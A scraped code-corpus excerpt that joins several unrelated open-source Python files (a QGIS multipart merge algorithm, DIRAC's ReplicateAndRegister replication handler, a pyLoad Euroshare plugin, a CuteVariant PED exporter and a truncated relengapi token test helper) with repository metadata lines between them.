def defineCharacteristics(self):
self.addParameter(ParameterVector(self.INPUT, self.tr('Input layer')))
self.addParameter(ParameterTableField(self.FIELD,
self.tr('Unique ID field'), self.INPUT))
self.addOutput(OutputVector(self.OUTPUT, self.tr('Multipart')))
def processAlgorithm(self, context, feedback):
layer = QgsProcessingUtils.mapLayerFromString(self.getParameterValue(self.INPUT), context)
fieldName = self.getParameterValue(self.FIELD)
geomType = QgsWkbTypes.multiType(layer.wkbType())
writer = self.getOutputFromName(self.OUTPUT).getVectorWriter(layer.fields(), geomType, layer.crs(),
context)
outFeat = QgsFeature()
inGeom = QgsGeometry()
index = layer.fields().lookupField(fieldName)
collection_geom = {}
collection_attrs = {}
features = QgsProcessingUtils.getFeatures(layer, context)
total = 100.0 / QgsProcessingUtils.featureCount(layer, context)
for current, feature in enumerate(features):
atMap = feature.attributes()
idVar = atMap[index]
if idVar in [None, NULL]:
outFeat.setAttributes(atMap)
outFeat.setGeometry(feature.geometry())
writer.addFeature(outFeat)
feedback.setProgress(int(current * total))
continue
key = str(idVar).strip()
if key not in collection_geom:
collection_geom[key] = []
collection_attrs[key] = atMap
inGeom = feature.geometry()
collection_geom[key].append(inGeom)
feedback.setProgress(int(current * total))
for key, geoms in collection_geom.items():
outFeat.setAttributes(collection_attrs[key])
outFeat.setGeometry(QgsGeometry.collectGeometry(geoms))
writer.addFeature(outFeat)
del writer
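# Illustrative note (not part of the original algorithm): features that share the
# same value in the chosen ID field are merged into a single multipart feature
# via QgsGeometry.collectGeometry(), and the merged feature keeps the attributes
# of the first feature encountered for that key; features with a NULL ID are
# copied through unchanged.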
|
gpl-2.0
| 3,639,953,806,379,038,000
| 35.0625
| 107
| 0.564001
| false
| 4.631881
| false
| false
| false
|
arrabito/DIRAC
|
DataManagementSystem/Agent/RequestOperations/ReplicateAndRegister.py
|
1
|
28823
|
########################################################################
# File: ReplicateAndRegister.py
# Author: Krzysztof.Ciba@NOSPAMgmail.com
# Date: 2013/03/13 18:49:12
########################################################################
""" :mod: ReplicateAndRegister
==========================
.. module: ReplicateAndRegister
:synopsis: ReplicateAndRegister operation handler
.. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com
ReplicateAndRegister operation handler
"""
__RCSID__ = "$Id$"
# #
# @file ReplicateAndRegister.py
# @author Krzysztof.Ciba@NOSPAMgmail.com
# @date 2013/03/13 18:49:28
# @brief Definition of ReplicateAndRegister class.
# # imports
import re
from collections import defaultdict
# # from DIRAC
from DIRAC import S_OK, S_ERROR, gLogger
from DIRAC.Core.Utilities.Adler import compareAdler, hexAdlerToInt, intAdlerToHex
from DIRAC.FrameworkSystem.Client.MonitoringClient import gMonitor
from DIRAC.DataManagementSystem.Client.DataManager import DataManager
from DIRAC.DataManagementSystem.Agent.RequestOperations.DMSRequestOperationsBase import DMSRequestOperationsBase
from DIRAC.Resources.Storage.StorageElement import StorageElement
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
from DIRAC.DataManagementSystem.Client.FTS3Operation import FTS3TransferOperation
from DIRAC.DataManagementSystem.Client.FTS3File import FTS3File
from DIRAC.DataManagementSystem.Client.FTS3Client import FTS3Client
from DIRAC.ConfigurationSystem.Client.Helpers import Registry
from DIRAC.DataManagementSystem.Client.FTSClient import FTSClient
def filterReplicas(opFile, logger=None, dataManager=None):
""" filter out banned/invalid source SEs """
if logger is None:
logger = gLogger
if dataManager is None:
dataManager = DataManager()
log = logger.getSubLogger("filterReplicas")
result = defaultdict(list)
replicas = dataManager.getActiveReplicas(opFile.LFN, getUrl=False)
if not replicas["OK"]:
log.error('Failed to get active replicas', replicas["Message"])
return replicas
reNotExists = re.compile(r".*such file.*")
replicas = replicas["Value"]
failed = replicas["Failed"].get(opFile.LFN, "")
if reNotExists.match(failed.lower()):
opFile.Status = "Failed"
opFile.Error = failed
return S_ERROR(failed)
replicas = replicas["Successful"].get(opFile.LFN, {})
noReplicas = False
if not replicas:
allReplicas = dataManager.getReplicas(opFile.LFN, getUrl=False)
if allReplicas['OK']:
allReplicas = allReplicas['Value']['Successful'].get(opFile.LFN, {})
if not allReplicas:
result['NoReplicas'].append(None)
noReplicas = True
else:
# There are replicas but we cannot get metadata because the replica is not active
result['NoActiveReplicas'] += list(allReplicas)
log.verbose("File has no%s replica in File Catalog" % ('' if noReplicas else ' active'), opFile.LFN)
else:
return allReplicas
if not opFile.Checksum or hexAdlerToInt(opFile.Checksum) is False:
# Set Checksum to FC checksum if not set in the request
fcMetadata = FileCatalog().getFileMetadata(opFile.LFN)
fcChecksum = fcMetadata.get(
'Value',
{}).get(
'Successful',
{}).get(
opFile.LFN,
{}).get('Checksum')
# Replace opFile.Checksum if it doesn't match a valid FC checksum
if fcChecksum:
if hexAdlerToInt(fcChecksum) is not False:
opFile.Checksum = fcChecksum
opFile.ChecksumType = fcMetadata['Value']['Successful'][opFile.LFN].get('ChecksumType', 'Adler32')
else:
opFile.Checksum = None
# If no replica was found, return what we collected as information
if not replicas:
return S_OK(result)
for repSEName in replicas:
repSEMetadata = StorageElement(repSEName).getFileMetadata(opFile.LFN)
error = repSEMetadata.get('Message', repSEMetadata.get('Value', {}).get('Failed', {}).get(opFile.LFN))
if error:
log.warn('unable to get metadata at %s for %s' % (repSEName, opFile.LFN), error.replace('\n', ''))
if 'File does not exist' in error:
result['NoReplicas'].append(repSEName)
else:
result["NoMetadata"].append(repSEName)
elif not noReplicas:
repSEMetadata = repSEMetadata['Value']['Successful'][opFile.LFN]
seChecksum = hexAdlerToInt(repSEMetadata.get("Checksum"))
# As from here seChecksum is an integer or False, not a hex string!
if seChecksum is False and opFile.Checksum:
result['NoMetadata'].append(repSEName)
elif not seChecksum and opFile.Checksum:
opFile.Checksum = None
opFile.ChecksumType = None
elif seChecksum and (not opFile.Checksum or opFile.Checksum == 'False'):
# Use the SE checksum (convert to hex) and force type to be Adler32
opFile.Checksum = intAdlerToHex(seChecksum)
opFile.ChecksumType = 'Adler32'
if not opFile.Checksum or not seChecksum or compareAdler(
intAdlerToHex(seChecksum), opFile.Checksum):
# # All checksums are OK
result["Valid"].append(repSEName)
else:
log.warn(" %s checksum mismatch, FC: '%s' @%s: '%s'" %
(opFile.LFN, opFile.Checksum, repSEName, intAdlerToHex(seChecksum)))
result["Bad"].append(repSEName)
else:
# If a replica was found somewhere, don't set the file as no replicas
result['NoReplicas'] = []
return S_OK(result)
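# Illustrative note (not part of the original module): on success filterReplicas()
# returns S_OK() whose 'Value' is a dict keyed by category, along the lines of
#   {'Valid': ['SOME-SE'], 'Bad': [], 'NoMetadata': [], 'NoReplicas': [],
#    'NoActiveReplicas': []}
# where 'SOME-SE' stands in for a storage element name and is hypothetical.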
########################################################################
class ReplicateAndRegister(DMSRequestOperationsBase):
"""
.. class:: ReplicateAndRegister
ReplicateAndRegister operation handler
"""
def __init__(self, operation=None, csPath=None):
"""c'tor
:param self: self reference
:param Operation operation: Operation instance
:param str csPath: CS path for this handler
"""
super(ReplicateAndRegister, self).__init__(operation, csPath)
# # own gMonitor stuff for files
gMonitor.registerActivity("ReplicateAndRegisterAtt", "Replicate and register attempted",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("ReplicateOK", "Replications successful",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("ReplicateFail", "Replications failed",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("RegisterOK", "Registrations successful",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("RegisterFail", "Registrations failed",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
# # for FTS
gMonitor.registerActivity("FTSScheduleAtt", "Files schedule attempted",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("FTSScheduleOK", "File schedule successful",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("FTSScheduleFail", "File schedule failed",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
# # SE cache
# Clients
self.fc = FileCatalog()
def __call__(self):
""" call me maybe """
# # check replicas first
checkReplicas = self.__checkReplicas()
if not checkReplicas["OK"]:
self.log.error('Failed to check replicas', checkReplicas["Message"])
if hasattr(self, "FTSMode") and getattr(self, "FTSMode"):
bannedGroups = getattr(self, "FTSBannedGroups") if hasattr(self, "FTSBannedGroups") else ()
if self.request.OwnerGroup in bannedGroups:
self.log.verbose("usage of FTS system is banned for request's owner")
return self.dmTransfer()
if getattr(self, 'UseNewFTS3', False):
return self.fts3Transfer()
else:
return self.ftsTransfer()
return self.dmTransfer()
def __checkReplicas(self):
""" check done replicas and update file states """
waitingFiles = dict([(opFile.LFN, opFile) for opFile in self.operation
if opFile.Status in ("Waiting", "Scheduled")])
targetSESet = set(self.operation.targetSEList)
replicas = self.fc.getReplicas(waitingFiles.keys())
if not replicas["OK"]:
self.log.error('Failed to get replicas', replicas["Message"])
return replicas
reMissing = re.compile(r".*such file.*")
for failedLFN, errStr in replicas["Value"]["Failed"].iteritems():
waitingFiles[failedLFN].Error = errStr
if reMissing.search(errStr.lower()):
self.log.error("File does not exists", failedLFN)
gMonitor.addMark("ReplicateFail", len(targetSESet))
waitingFiles[failedLFN].Status = "Failed"
for successfulLFN, reps in replicas["Value"]["Successful"].iteritems():
if targetSESet.issubset(set(reps)):
self.log.info("file %s has been replicated to all targets" % successfulLFN)
waitingFiles[successfulLFN].Status = "Done"
return S_OK()
def _addMetadataToFiles(self, toSchedule):
""" Add metadata to those files that need to be scheduled through FTS
toSchedule is a dictionary mapping each LFN to a list whose first element
is the corresponding opFile, e.g. {'lfn1': [opFile1, ...], 'lfn2': [opFile2, ...]}
"""
if toSchedule:
self.log.info("found %s files to schedule, getting metadata from FC" % len(toSchedule))
else:
self.log.verbose("No files to schedule")
return S_OK([])
res = self.fc.getFileMetadata(toSchedule.keys())
if not res['OK']:
return res
else:
if res['Value']['Failed']:
self.log.warn("Can't schedule %d files: problems getting the metadata: %s" %
(len(res['Value']['Failed']), ', '.join(res['Value']['Failed'])))
metadata = res['Value']['Successful']
filesToSchedule = {}
for lfn, lfnMetadata in metadata.iteritems():
opFileToSchedule = toSchedule[lfn][0]
opFileToSchedule.GUID = lfnMetadata['GUID']
# In principle this is defined already in filterReplicas()
if not opFileToSchedule.Checksum:
opFileToSchedule.Checksum = metadata[lfn]['Checksum']
opFileToSchedule.ChecksumType = metadata[lfn]['ChecksumType']
opFileToSchedule.Size = metadata[lfn]['Size']
filesToSchedule[opFileToSchedule.LFN] = opFileToSchedule
return S_OK(filesToSchedule)
def _filterReplicas(self, opFile):
""" filter out banned/invalid source SEs """
return filterReplicas(opFile, logger=self.log, dataManager=self.dm)
def ftsTransfer(self):
""" replicate and register using FTS """
self.log.info("scheduling files in FTS...")
bannedTargets = self.checkSEsRSS()
if not bannedTargets['OK']:
gMonitor.addMark("FTSScheduleAtt")
gMonitor.addMark("FTSScheduleFail")
return bannedTargets
if bannedTargets['Value']:
return S_OK("%s targets are banned for writing" % ",".join(bannedTargets['Value']))
# Can continue now
self.log.verbose("No targets banned for writing")
toSchedule = {}
delayExecution = 0
errors = defaultdict(int)
for opFile in self.getWaitingFilesList():
opFile.Error = ''
gMonitor.addMark("FTSScheduleAtt")
# # check replicas
replicas = self._filterReplicas(opFile)
if not replicas["OK"]:
continue
replicas = replicas["Value"]
validReplicas = replicas.get("Valid")
noMetaReplicas = replicas.get("NoMetadata")
noReplicas = replicas.get('NoReplicas')
badReplicas = replicas.get('Bad')
noActiveReplicas = replicas.get('NoActiveReplicas')
if validReplicas:
validTargets = list(set(self.operation.targetSEList) - set(validReplicas))
if not validTargets:
self.log.info("file %s is already present at all targets" % opFile.LFN)
opFile.Status = "Done"
else:
toSchedule[opFile.LFN] = [opFile, validReplicas, validTargets]
else:
gMonitor.addMark("FTSScheduleFail")
if noMetaReplicas:
err = "Couldn't get metadata"
errors[err] += 1
self.log.verbose(
"unable to schedule '%s', %s at %s" %
(opFile.LFN, err, ','.join(noMetaReplicas)))
opFile.Error = err
elif noReplicas:
err = "File doesn't exist"
errors[err] += 1
self.log.error("Unable to schedule transfer",
"%s %s at %s" % (opFile.LFN, err, ','.join(noReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif badReplicas:
err = "All replicas have a bad checksum"
errors[err] += 1
self.log.error("Unable to schedule transfer",
"%s, %s at %s" % (opFile.LFN, err, ','.join(badReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif noActiveReplicas:
err = "No active replica found"
errors[err] += 1
self.log.verbose("Unable to schedule transfer",
"%s, %s at %s" % (opFile.LFN, err, ','.join(noActiveReplicas)))
opFile.Error = err
# All source SEs are banned, delay execution by 1 hour
delayExecution = 60
if delayExecution:
self.log.info("Delay execution of the request by %d minutes" % delayExecution)
self.request.delayNextExecution(delayExecution)
# Log error counts
for error, count in errors.iteritems():
self.log.error(error, 'for %d files' % count)
filesToScheduleList = []
res = self._addMetadataToFiles(toSchedule)
if not res['OK']:
return res
else:
filesToSchedule = res['Value']
for lfn in filesToSchedule:
filesToScheduleList.append((filesToSchedule[lfn][0].toJSON()['Value'],
toSchedule[lfn][1],
toSchedule[lfn][2]))
if filesToScheduleList:
ftsSchedule = FTSClient().ftsSchedule(self.request.RequestID,
self.operation.OperationID,
filesToScheduleList)
if not ftsSchedule["OK"]:
self.log.error("Completely failed to schedule to FTS:", ftsSchedule["Message"])
return ftsSchedule
# might have nothing to schedule
ftsSchedule = ftsSchedule["Value"]
if not ftsSchedule:
return S_OK()
self.log.info("%d files have been scheduled to FTS" % len(ftsSchedule['Successful']))
for opFile in self.operation:
fileID = opFile.FileID
if fileID in ftsSchedule["Successful"]:
gMonitor.addMark("FTSScheduleOK", 1)
opFile.Status = "Scheduled"
self.log.debug("%s has been scheduled for FTS" % opFile.LFN)
elif fileID in ftsSchedule["Failed"]:
gMonitor.addMark("FTSScheduleFail", 1)
opFile.Error = ftsSchedule["Failed"][fileID]
if 'sourceSURL equals to targetSURL' in opFile.Error:
# In this case there is no need to continue
opFile.Status = 'Failed'
self.log.warn("unable to schedule %s for FTS: %s" % (opFile.LFN, opFile.Error))
else:
self.log.info("No files to schedule after metadata checks")
# Just in case some transfers could not be scheduled, try them with RM
return self.dmTransfer(fromFTS=True)
def _checkExistingFTS3Operations(self):
"""
Check if there are ongoing FTS3Operation for the current RMS Operation
Under some conditions, we can be trying to schedule files while
there is still an FTS transfer going on. This typically happens
when the REA hangs. To prevent further race condition, we check
if there are FTS3Operations in a non Final state matching the
current operation ID. If so, we put the corresponding files in
scheduled mode. We will then wait till the FTS3 Operation performs
the callback
:returns: S_OK with True if we can go on, False if we should stop the processing
"""
res = FTS3Client().getOperationsFromRMSOpID(self.operation.OperationID)
if not res['OK']:
self.log.debug(
"Could not get FTS3Operations matching OperationID",
self.operation.OperationID)
return res
existingFTSOperations = res['Value']
# It is ok to have FTS Operations in a final state, so we
# care only about the others
unfinishedFTSOperations = [
ops for ops in existingFTSOperations if ops.status not in FTS3TransferOperation.FINAL_STATES]
if not unfinishedFTSOperations:
self.log.debug("No ongoing FTS3Operations, all good")
return S_OK(True)
self.log.warn("Some FTS3Operations already exist for the RMS Operation:",
[op.operationID for op in unfinishedFTSOperations])
# This would really be a screwed up situation !
if len(unfinishedFTSOperations) > 1:
self.log.warn("That's a serious problem !!")
# We take the rmsFileID of the files in the Operations,
# find the corresponding File object, and set them scheduled
rmsFileIDsToSetScheduled = set(
[ftsFile.rmsFileID for ftsOp in unfinishedFTSOperations for ftsFile in ftsOp.ftsFiles])
for opFile in self.operation:
# If it is in the DB, it has a FileID
opFileID = opFile.FileID
if opFileID in rmsFileIDsToSetScheduled:
self.log.warn("Setting RMSFile as already scheduled", opFileID)
opFile.Status = "Scheduled"
# We return here such that the Request is set back to Scheduled in the DB
# With no further modification
return S_OK(False)
def fts3Transfer(self):
""" replicate and register using FTS3 """
self.log.info("scheduling files in FTS3...")
# Check first if we do not have ongoing transfers
res = self._checkExistingFTS3Operations()
if not res['OK']:
return res
# if res['Value'] is False
# it means that there are ongoing transfers
# and we should stop here
if res['Value'] is False:
# return S_OK such that the request is put back
return S_OK()
fts3Files = []
toSchedule = {}
# Dict which maps the FileID to the object
rmsFilesIds = {}
for opFile in self.getWaitingFilesList():
rmsFilesIds[opFile.FileID] = opFile
opFile.Error = ''
gMonitor.addMark("FTSScheduleAtt")
# # check replicas
replicas = self._filterReplicas(opFile)
if not replicas["OK"]:
continue
replicas = replicas["Value"]
validReplicas = replicas["Valid"]
noMetaReplicas = replicas["NoMetadata"]
noReplicas = replicas['NoReplicas']
badReplicas = replicas['Bad']
noPFN = replicas['NoPFN']
if validReplicas:
validTargets = list(set(self.operation.targetSEList) - set(validReplicas))
if not validTargets:
self.log.info("file %s is already present at all targets" % opFile.LFN)
opFile.Status = "Done"
else:
toSchedule[opFile.LFN] = [opFile, validTargets]
else:
gMonitor.addMark("FTSScheduleFail")
if noMetaReplicas:
self.log.warn("unable to schedule '%s', couldn't get metadata at %s" % (opFile.LFN, ','.join(noMetaReplicas)))
opFile.Error = "Couldn't get metadata"
elif noReplicas:
self.log.error(
"Unable to schedule transfer", "File %s doesn't exist at %s" %
(opFile.LFN, ','.join(noReplicas)))
opFile.Error = 'No replicas found'
opFile.Status = 'Failed'
elif badReplicas:
self.log.error(
"Unable to schedule transfer",
"File %s, all replicas have a bad checksum at %s" %
(opFile.LFN,
','.join(badReplicas)))
opFile.Error = 'All replicas have a bad checksum'
opFile.Status = 'Failed'
elif noPFN:
self.log.warn(
"unable to schedule %s, could not get a PFN at %s" %
(opFile.LFN, ','.join(noPFN)))
res = self._addMetadataToFiles(toSchedule)
if not res['OK']:
return res
else:
filesToSchedule = res['Value']
for lfn in filesToSchedule:
opFile = filesToSchedule[lfn]
validTargets = toSchedule[lfn][1]
for targetSE in validTargets:
ftsFile = FTS3File.fromRMSFile(opFile, targetSE)
fts3Files.append(ftsFile)
if fts3Files:
res = Registry.getUsernameForDN(self.request.OwnerDN)
if not res['OK']:
self.log.error(
"Cannot get username for DN", "%s %s" %
(self.request.OwnerDN, res['Message']))
return res
username = res['Value']
fts3Operation = FTS3TransferOperation.fromRMSObjects(self.request, self.operation, username)
fts3Operation.ftsFiles = fts3Files
ftsSchedule = FTS3Client().persistOperation(fts3Operation)
if not ftsSchedule["OK"]:
self.log.error("Completely failed to schedule to FTS3:", ftsSchedule["Message"])
return ftsSchedule
# might have nothing to schedule
ftsSchedule = ftsSchedule["Value"]
self.log.info("Scheduled with FTS3Operation id %s" % ftsSchedule)
self.log.info("%d files have been scheduled to FTS3" % len(fts3Files))
for ftsFile in fts3Files:
opFile = rmsFilesIds[ftsFile.rmsFileID]
gMonitor.addMark("FTSScheduleOK", 1)
opFile.Status = "Scheduled"
self.log.debug("%s has been scheduled for FTS" % opFile.LFN)
else:
self.log.info("No files to schedule after metadata checks")
# Just in case some transfers could not be scheduled, try them with RM
return self.dmTransfer(fromFTS=True)
def dmTransfer(self, fromFTS=False):
""" replicate and register using dataManager """
# # get waiting files. If none just return
# # source SE
sourceSE = self.operation.SourceSE if self.operation.SourceSE else None
if sourceSE:
# # check source se for read
bannedSource = self.checkSEsRSS(sourceSE, 'ReadAccess')
if not bannedSource["OK"]:
gMonitor.addMark("ReplicateAndRegisterAtt", len(self.operation))
gMonitor.addMark("ReplicateFail", len(self.operation))
return bannedSource
if bannedSource["Value"]:
self.operation.Error = "SourceSE %s is banned for reading" % sourceSE
self.log.info(self.operation.Error)
return S_OK(self.operation.Error)
# # check targetSEs for write
bannedTargets = self.checkSEsRSS()
if not bannedTargets['OK']:
gMonitor.addMark("ReplicateAndRegisterAtt", len(self.operation))
gMonitor.addMark("ReplicateFail", len(self.operation))
return bannedTargets
if bannedTargets['Value']:
self.operation.Error = "%s targets are banned for writing" % ",".join(bannedTargets['Value'])
return S_OK(self.operation.Error)
# Can continue now
self.log.verbose("No targets banned for writing")
waitingFiles = self.getWaitingFilesList()
if not waitingFiles:
return S_OK()
# # loop over files
if fromFTS:
self.log.info("Trying transfer using replica manager as FTS failed")
else:
self.log.info("Transferring files using Data manager...")
errors = defaultdict(int)
delayExecution = 0
for opFile in waitingFiles:
if opFile.Error in ("Couldn't get metadata",
"File doesn't exist",
'No active replica found',
"All replicas have a bad checksum",):
err = "File already in error status"
errors[err] += 1
gMonitor.addMark("ReplicateAndRegisterAtt", 1)
opFile.Error = ''
lfn = opFile.LFN
# Check if replica is at the specified source
replicas = self._filterReplicas(opFile)
if not replicas["OK"]:
self.log.error('Failed to check replicas', replicas["Message"])
continue
replicas = replicas["Value"]
validReplicas = replicas.get("Valid")
noMetaReplicas = replicas.get("NoMetadata")
noReplicas = replicas.get('NoReplicas')
badReplicas = replicas.get('Bad')
noActiveReplicas = replicas.get('NoActiveReplicas')
if not validReplicas:
gMonitor.addMark("ReplicateFail")
if noMetaReplicas:
err = "Couldn't get metadata"
errors[err] += 1
self.log.verbose(
"unable to replicate '%s', couldn't get metadata at %s" %
(opFile.LFN, ','.join(noMetaReplicas)))
opFile.Error = err
elif noReplicas:
err = "File doesn't exist"
errors[err] += 1
self.log.verbose(
"Unable to replicate", "File %s doesn't exist at %s" %
(opFile.LFN, ','.join(noReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif badReplicas:
err = "All replicas have a bad checksum"
errors[err] += 1
self.log.error(
"Unable to replicate", "%s, all replicas have a bad checksum at %s" %
(opFile.LFN, ','.join(badReplicas)))
opFile.Error = err
opFile.Status = 'Failed'
elif noActiveReplicas:
err = "No active replica found"
errors[err] += 1
self.log.verbose("Unable to schedule transfer",
"%s, %s at %s" % (opFile.LFN, err, ','.join(noActiveReplicas)))
opFile.Error = err
# All source SEs are banned, delay execution by 1 hour
delayExecution = 60
continue
# # get the first one in the list
if sourceSE not in validReplicas:
if sourceSE:
err = "File not at specified source"
errors[err] += 1
self.log.warn(
"%s is not at specified sourceSE %s, changed to %s" %
(lfn, sourceSE, validReplicas[0]))
sourceSE = validReplicas[0]
# # loop over targetSE
catalogs = self.operation.Catalog
if catalogs:
catalogs = [cat.strip() for cat in catalogs.split(',')]
for targetSE in self.operation.targetSEList:
# # call DataManager
if targetSE in validReplicas:
self.log.warn("Request to replicate %s to an existing location: %s" % (lfn, targetSE))
opFile.Status = 'Done'
continue
res = self.dm.replicateAndRegister(lfn, targetSE, sourceSE=sourceSE, catalog=catalogs)
if res["OK"]:
if lfn in res["Value"]["Successful"]:
if "replicate" in res["Value"]["Successful"][lfn]:
repTime = res["Value"]["Successful"][lfn]["replicate"]
prString = "file %s replicated at %s in %s s." % (lfn, targetSE, repTime)
gMonitor.addMark("ReplicateOK", 1)
if "register" in res["Value"]["Successful"][lfn]:
gMonitor.addMark("RegisterOK", 1)
regTime = res["Value"]["Successful"][lfn]["register"]
prString += ' and registered in %s s.' % regTime
self.log.info(prString)
else:
gMonitor.addMark("RegisterFail", 1)
prString += " but failed to register"
self.log.warn(prString)
opFile.Error = "Failed to register"
# # add register replica operation
registerOperation = self.getRegisterOperation(
opFile, targetSE, type='RegisterReplica')
self.request.insertAfter(registerOperation, self.operation)
else:
self.log.error("Failed to replicate", "%s to %s" % (lfn, targetSE))
gMonitor.addMark("ReplicateFail", 1)
opFile.Error = "Failed to replicate"
else:
gMonitor.addMark("ReplicateFail", 1)
reason = res["Value"]["Failed"][lfn]
self.log.error(
"Failed to replicate and register", "File %s at %s:" %
(lfn, targetSE), reason)
opFile.Error = reason
else:
gMonitor.addMark("ReplicateFail", 1)
opFile.Error = "DataManager error: %s" % res["Message"]
self.log.error("DataManager error", res["Message"])
if not opFile.Error:
if len(self.operation.targetSEList) > 1:
self.log.info("file %s has been replicated to all targetSEs" % lfn)
opFile.Status = "Done"
# Log error counts
if delayExecution:
self.log.info("Delay execution of the request by %d minutes" % delayExecution)
self.request.delayNextExecution(delayExecution)
for error, count in errors.iteritems():
self.log.error(error, 'for %d files' % count)
return S_OK()
|
gpl-3.0
| 803,170,856,147,399,300
| 37.025066
| 120
| 0.628526
| false
| 3.908203
| false
| false
| false
|
fener06/pyload
|
module/plugins/hoster/EuroshareEu.py
|
1
|
2302
|
# -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: zoidberg
"""
import re
from module.plugins.internal.SimpleHoster import SimpleHoster, create_getInfo
class EuroshareEu(SimpleHoster):
__name__ = "EuroshareEu"
__type__ = "hoster"
__pattern__ = r"http://(\w*\.)?euroshare.(eu|sk|cz|hu|pl)/file/.*"
__version__ = "0.23"
__description__ = """Euroshare.eu"""
__author_name__ = ("zoidberg")
FILE_INFO_PATTERN = r'<span style="float: left;"><strong>(?P<N>.+?)</strong> \((?P<S>.+?)\)</span>'
FILE_OFFLINE_PATTERN = ur'<h2>S.bor sa nena.iel</h2>|Požadovaná stránka neexistuje!'
FREE_URL_PATTERN = r'<a href="(/file/\d+/[^/]*/download/)"><div class="downloadButton"'
ERR_PARDL_PATTERN = r'<h2>Prebieha s.ahovanie</h2>|<p>Naraz je z jednej IP adresy mo.n. s.ahova. iba jeden s.bor'
FILE_URL_REPLACEMENTS = [(r"(http://[^/]*\.)(sk|cz|hu|pl)/", r"\1eu/")]
def handlePremium(self):
self.download(self.pyfile.url.rstrip('/') + "/download/")
def handleFree(self):
if re.search(self.ERR_PARDL_PATTERN, self.html) is not None:
self.longWait(300, 12)
found = re.search(self.FREE_URL_PATTERN, self.html)
if found is None:
self.parseError("Parse error (URL)")
parsed_url = "http://euroshare.eu%s" % found.group(1)
self.logDebug("URL", parsed_url)
self.download(parsed_url, disposition=True)
check = self.checkDownload({"multi_dl": re.compile(self.ERR_PARDL_PATTERN)})
if check == "multi_dl":
self.longWait(300, 12)
getInfo = create_getInfo(EuroshareEu)
|
gpl-3.0
| 7,234,009,282,891,823,000
| 40.071429
| 117
| 0.629839
| false
| 3.33672
| false
| false
| false
|
labsquare/CuteVariant
|
cutevariant/core/writer/pedwriter.py
|
1
|
2889
|
import csv
from .abstractwriter import AbstractWriter
from cutevariant.core.sql import get_samples
class PedWriter(AbstractWriter):
"""Writer allowing to export samples of a project into a PED/PLINK file.
Attributes:
device: a file object typically returned by open("w")
Example:
>>> with open(filename,"rw") as file:
... writer = MyWriter(file)
... writer.save(conn)
"""
def __init__(self, device):
super().__init__(device)
def save(self, conn, delimiter="\t", **kwargs):
r"""Dump samples into a tabular file
Notes:
File is written without header.
Example of line::
`family_id\tindividual_id\tfather_id\tmother_id\tsex\tphenotype`
Args:
conn (sqlite.connection): sqlite connection
delimiter (str, optional): Delimiter char used in exported file;
(default: ``\t``).
**kwargs (dict, optional): Arguments can be given to override
individual formatting parameters in the current dialect.
"""
writer = csv.DictWriter(
self.device,
delimiter=delimiter,
lineterminator="\n",
fieldnames=[
"family_id",
"name",
"father_id",
"mother_id",
"sex",
"phenotype",
],
extrasaction="ignore",
**kwargs
)
g = list(get_samples(conn))
# Map DB ids with individual_ids
individual_ids_mapping = {sample["id"]: sample["name"] for sample in g}
# Add default value
individual_ids_mapping[0] = 0
# Replace DB ids
for sample in g:
sample["father_id"] = individual_ids_mapping[sample["father_id"]]
sample["mother_id"] = individual_ids_mapping[sample["mother_id"]]
writer.writerows(g)
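# Illustrative note (not part of the original writer): a line produced by save()
# looks like
#   FAM1<TAB>sample1<TAB>father1<TAB>mother1<TAB>1<TAB>2
# with tab-separated family_id, name, father_id, mother_id, sex and phenotype;
# all identifiers here are hypothetical.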
def save_from_list(self, samples, delimiter="\t", **kwargs):
r"""Dump samples into a tabular file
Args:
samples(list): Iterable of samples; each sample is a list itself.
=> It's up to the user to give the fields in the correct order.
delimiter (str, optional): Delimiter char used in exported file;
(default: ``\t``).
**kwargs (dict, optional): Arguments can be given to override
individual formatting parameters in the current dialect.
Notes:
Replace None or empty strings to 0 (unknown PED ID)
"""
writer = csv.writer(
self.device, delimiter=delimiter, lineterminator="\n", **kwargs
)
# Replace None or empty strings to 0 (unknown PED ID)
clean_samples = ([item if item else 0 for item in sample] for sample in samples)
writer.writerows(clean_samples)
|
gpl-3.0
| -2,977,546,047,046,953,000
| 32.988235
| 88
| 0.563171
| false
| 4.472136
| false
| false
| false
|
Callek/build-relengapi
|
relengapi/blueprints/tokenauth/util.py
|
1
|
2357
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import json
from itsdangerous import BadData
from relengapi.blueprints.tokenauth.tables import Token
from relengapi.lib.permissions import p
# test utilities
class FakeSerializer(object):
"""A token serializer that produces a readable serialization, for use in
tests."""
@staticmethod
def prm(id):
return FakeSerializer.dumps(
{"iss": "ra2", "jti": "t%d" % id, "typ": "prm"})
@staticmethod
def tmp(nbf, exp, prm, mta):
return FakeSerializer.dumps(
{"iss": "ra2", "typ": "tmp", 'nbf': nbf,
"exp": exp, "prm": prm, "mta": mta})
@staticmethod
def usr(id):
return FakeSerializer.dumps(
{"iss": "ra2", "jti": "t%d" % id, "typ": "usr"})
@staticmethod
def dumps(data):
return 'FK:' + json.dumps(data,
separators=(',', ':'),
sort_keys=True)
@staticmethod
def loads(data):
if data[:3] != 'FK:':
raise BadData('Not a fake token')
else:
return json.loads(data[3:])
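# Illustrative note (not part of the original module): FakeSerializer.prm(1)
# serializes to the readable string
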